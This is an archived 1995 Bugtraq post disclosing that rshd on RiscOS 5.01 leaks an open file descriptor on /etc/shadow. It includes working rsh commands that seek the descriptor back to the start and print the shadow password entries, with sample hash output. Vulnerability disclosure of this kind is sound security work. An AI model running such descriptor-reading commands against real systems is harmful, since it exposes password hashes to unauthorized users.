[2095] in bugtraq
BUG (and exploit): RiscOS 5.01 rshd has FD leaks...
daemon@ATHENA.MIT.EDU (Jeremy Fitzhardinge)
Fri Aug 11 11:18:27 1995
Date: Fri, 11 Aug 1995 16:20:33 -0500
Reply-To: Bugtraq List <BUGTRAQ@CRIMELAB.COM>
From: Jeremy Fitzhardinge <jeremy@suede.sw.oz.au>
X-To: bugtraq@CRIMELAB.COM
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@CRIMELAB.COM>
Hi all,
When rsh'ing to a RiscOS 5.01 machine, the process being run has a file
descriptor open RO on the shadow password file. A simple program to
seek it back to 0 and copy will reveal the encrypted passwords to
anyone who can rsh to the machine.
suite is a Mips RiscOS 5.01 machine; suede is a Solaris box
: suite:4; ls -li /etc/shadow
4409 -r-------- 1 root 4072 Aug 11 08:48 /etc/shadow
: suede:21; rsh suite t/openfd
21 Dev (33, 0), ino 2679, type character special
20 Dev (33, 0), ino 2679, type character special
8 Dev (255, 255), ino 13566, type FIFO
7 Dev (33, 0), ino 4409, type regular file *****
4 Dev (33, 0), ino 4409, type regular file *****
2 Dev (255, 255), ino 13566, type FIFO
1 Dev (0, 0), ino 0, type Unknown
Numeric type: 0
0 Dev (0, 0), ino 0, type Unknown
Numeric type: 0
(seek0 just seeks its stdin to offset 0)
: suede:21; rsh suite '(t/seek0; cat)</dev/fd/7'
root:oHnoyOuDOnt:9334::::::
setup:*NOLOGIN*:8603::::::
sysadm:*NOLOGIN*:8603::::::
daemon:*NOLOGIN*:8603::::::
bin:*NOLOGIN*:8603::::::
...
I'm curious about the pipes as well; what are they to? I think the "unknown"
file descriptors are sockets; fstat doesn't seem to cope with them.
J
